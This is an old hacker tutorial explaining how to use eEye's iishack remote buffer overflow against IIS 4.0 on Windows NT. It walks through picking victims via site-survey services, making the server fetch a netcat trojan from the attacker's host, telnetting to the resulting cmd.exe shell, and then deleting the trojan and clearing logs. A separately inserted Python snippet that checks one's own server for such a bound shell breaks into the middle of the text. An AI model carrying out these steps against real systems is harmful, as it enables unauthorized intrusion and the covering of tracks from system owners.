
IIS Remote Buffer Overflow Attack

The Internet Information Server Attack: 
Remote buffer overflow exploit

By Aicra Byte

Forewords

Since this is a pretty new attack against the Internet Information Server, IIS, I have decided to write a paper on how to do it. A couple of days before I wrote this paper, I heard that two hackers from New Zealand were sent to jail because of this attack they did against an Asian television company. They now have to spend three years in jail and pay a fine of $10,000 each.
Decide for yourself if you wanna try this hack or not! 
This text goes out to all those NT hackers out there. It is based on the info I have from eEye Digital Security Team and my own experience.



Information

·	Note: All the files used in this document are available on my homepage http://cip.subnet.dk in the Software section.

According to eEye Digital Security Team, the systems affected include:

Internet Information Server 4.0 (IIS4)
Microsoft Windows NT 4.0 SP3 Option Pack 4
Microsoft Windows NT 4.0 SP4 Option Pack 4
Microsoft Windows NT 4.0 SP5 Option Pack 4

I used the attack on a Windows NT 4.0 machine against IIS 4.0 (SP4, Option Pack 4), with the following required programs:

·	iishack.exe
·	ncx.exe

Ncx.exe is a hacked-up version of the program netcat.exe. Ncx.exe always passes -l -p 80 -t -e cmd.exe as its arguments, which means that ncx.exe binds cmd.exe to port 80. The eEye people have received some reports from people not being able to use ncx.exe, so they have made another hacked version of netcat.exe, ncx99.exe. Ncx99.exe binds cmd.exe to port 99 instead of port 80, which should solve the problem. The reason ncx.exe sometimes doesn't work is that inetinfo.exe has to be exited before it can work. Ncx.exe fits the description of a trojan horse!

How to do it

First you'll have to find a server using IIS4, NT4 and/or SP3/4/5 + OP4. To do so, go to www.netcraft.com or your favourite “what's-this-site-running” search engine and find a victim running the affected system.

·	Then launch iishack.exe via the command prompt in WinNT. 

Output:

------(IIS 4.0 remote buffer overflow exploit)-----------------
(c) dark spyrit -- barns@eeye.com.
http://www.eEye.com

[usage: iishack <host> <port> <url> ]
eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe
do not include 'http://' before hosts!
---------------------------------------------------------------


·	Then issue the command as shown above, e.g.:

C:\>iishack www.YourIIS.com 80 YourOwnIpAddress/ncx.exe

Output (if successful):

Data sent!


·	Note: Give the IIS server enough time to download ncx.exe. Hint: Use Rasmon.exe to monitor your outgoing bytes.
·	After that, type telnet www.YourIIS.com 80 in cmd.exe or in the Start/Run menu.


Output:

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\>

·	Voila! Access granted!
·	Do whatever you wanna do, but remember to:
·	- add a scheduled task to restart inetinfo.exe in X minutes.
·	- add a scheduled task to delete ncx.exe after X-1 minutes.
·	- clean the logfiles (if there are any).
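An administrator's counterpart to the telnet check above, added here as an example that is not part of the original text or of eEye's tools: it asks ports 80 and 99 of your own server for a page and reports whether an HTTP status line or the NT cmd.exe banner answers, so a swapped-in ncx.exe/ncx99.exe listener is noticed without a manual telnet. The function names, the port list and the sample replies are my own assumptions, not anything from the text.

```python
import re
import socket

# Ports named in the text: ncx.exe binds cmd.exe to 80, ncx99.exe to 99.
CHECK_PORTS = (80, 99)
NT_BANNER = "Microsoft(R) Windows NT(TM)"
# A cmd.exe prompt such as "C:\>" or "C:\WINNT>" at the end of the reply.
PROMPT_RE = re.compile(r"[A-Za-z]:\\[^\r\n]*>\s*\Z")

def classify_response(data: bytes) -> str:
    """Say what answered after 'GET / HTTP/1.0' was sent to the port:
    'http' (a status line: IIS is still there), 'shell' (NT banner or a
    drive prompt: cmd.exe is bound), 'closed' (no data) or 'unknown'."""
    if not data:
        return "closed"
    text = data.decode("latin-1")
    if text.startswith("HTTP/"):
        return "http"
    if NT_BANNER in text or PROMPT_RE.search(text):
        return "shell"
    return "unknown"

def probe_port(host: str, port: int, timeout: float = 5.0) -> bytes:
    """Connect, send a minimal request, and return whatever the listener
    sends back within the timeout (empty bytes if the connection fails)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(b"GET / HTTP/1.0\r\n\r\n")
            chunks = []
            try:
                while chunk := s.recv(4096):
                    chunks.append(chunk)
            except socket.timeout:
                pass  # an interactive shell never closes; keep what we have
            return b"".join(chunks)
    except OSError:
        return b""

def check_host(host: str, ports=CHECK_PORTS, probe=probe_port) -> dict:
    """Return {port: verdict}; any 'shell' verdict means the web server
    process is no longer what answers on that port."""
    return {port: classify_response(probe(host, port)) for port in ports}

# Constructed replies (not captured from a real host) for offline checks.
SAMPLE_HTTP = b"HTTP/1.0 200 OK\r\nServer: Microsoft-IIS/4.0\r\n\r\n"
SAMPLE_SHELL = (b"Microsoft(R) Windows NT(TM)\r\n"
                b"(C) Copyright 1985-1996 Microsoft Corp.\r\n\r\nC:\\>")
```

Call check_host("your.server") against a host you administer; the SAMPLE_* replies let classify_response be exercised without any network.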


Be imaginative!
Hackers contribute to security.

******************************************************
Corrections, suggestion or comments:

Aicra Byte
aicra@yale.cadet.net
Cekurity In Progress
http://cip.subnet.dk
**************************************************************
